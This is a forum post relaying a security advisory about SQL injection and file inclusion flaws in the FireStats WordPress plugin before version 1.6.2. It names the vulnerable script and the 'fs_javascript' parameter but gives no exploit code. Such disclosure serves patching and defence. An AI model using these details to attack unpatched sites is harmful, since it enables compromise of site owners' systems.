Firestats Sql Injection And File Inclusion Vulnerabilities


Recommended Posts

FireStats SQL Injection and File Inclusion Vulnerabilities

Highly critical

Some vulnerabilities have been reported in the FireStats plugin

for WordPress, which can be exploited by malicious people to conduct SQL

injection attacks or to compromise a vulnerable system.

1) Input passed via unspecified parameters is not properly

sanitised before being used in an SQL query. This can be exploited to

manipulate SQL queries by injecting arbitrary SQL code.

2) Input passed via the "fs_javascript" parameter to

wp-content/plugins/firestats/firestats-wordpress.php is not properly

verified before being used to include files. This can be exploited to

include arbitrary files from local or external resources.

The vulnerabilities are reported in versions prior to

1.6.2-stable.

secunia advisories - http://secunia.com/advisories/35400/

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...